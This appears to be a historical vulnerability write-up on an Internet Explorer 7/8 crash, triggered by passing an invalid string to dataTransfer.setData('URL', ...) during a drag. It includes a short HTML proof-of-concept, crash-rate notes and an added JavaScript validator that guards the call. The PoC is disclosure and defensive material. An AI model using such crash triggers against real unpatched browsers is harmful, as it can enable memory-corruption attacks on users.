Setting an invalid URL in event.dataTransfer.setData("URL", ...) during a drag operation crashes IE. The !exploitable analyzer rated this EXPLOITABLE — EIP is changed, and the DEP access violation originates from an attacker-influenced address. The repro came directly from following MSDN’s own sample code.
<!-- datatransfer.html (loaded inside an iframe for higher crash rate) -->
<input id="t" ondragstart="InitiateDrag()" value="DragMe to the textBox below" size="30">
<input size="30">
<script type="text/javascript">
function InitiateDrag()
{
// Crash happens here
event.dataTransfer.setData("URL", "THIS_IS_AN_INVALID_URL");
// Reload so you can retry dragging
location.reload();
}
t.select();
</script>
The crash rate is roughly 1-in-3 when the PoC is loaded in an iframe, versus 1-in-12 when loaded directly. Drag the pre-selected text from the top input to the empty one below. Tested on Windows 7 IE8 (fully patched) and Vista IE7 (fully patched). A variation working 90% of the time on XP was also developed but not included here for simplicity.
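For anyone reusing the MSDN drag pattern above, an added example (editor's code, not from the original post or from Microsoft's sample) that validates the string before it ever reaches setData("URL", ...), falling back to a plain-text payload when the input is not a usable URL. It goes slightly beyond the post by also rejecting non-http(s) schemes, and it assumes a WHATWG URL parser (modern browsers or Node), which the IE7/IE8 builds in the post did not have; FakeDataTransfer is a constructed stand-in for event.dataTransfer so the logic runs outside a browser.

```javascript
// Added example: guard the "URL" drag format so malformed strings such as
// "THIS_IS_AN_INVALID_URL" never reach dataTransfer.setData("URL", ...).
// Assumes the WHATWG URL constructor is available (not true on IE7/IE8).
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns the normalized URL string when the input parses and uses an
// allowed scheme, otherwise null.
function validateDragUrl(candidate) {
  if (typeof candidate !== "string" || candidate.length === 0) return null;
  let parsed;
  try {
    parsed = new URL(candidate); // throws for scheme-less strings
  } catch (_) {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return null;
  return parsed.href;
}

// Sets the "URL" payload only when it validates; otherwise stores the raw
// string under the plain "Text" format instead. Returns the format used.
function setDragPayload(dataTransfer, candidate) {
  const url = validateDragUrl(candidate);
  if (url !== null) {
    dataTransfer.setData("URL", url);
    return "URL";
  }
  dataTransfer.setData("Text", String(candidate));
  return "Text";
}

// Constructed stand-in for event.dataTransfer so the functions above can be
// exercised without a browser.
class FakeDataTransfer {
  constructor() { this.items = {}; }
  setData(format, value) { this.items[format] = value; }
  getData(format) {
    return Object.prototype.hasOwnProperty.call(this.items, format) ? this.items[format] : "";
  }
}
```

In a real ondragstart handler you would call setDragPayload(event.dataTransfer, value) in place of the bare setData call.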
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.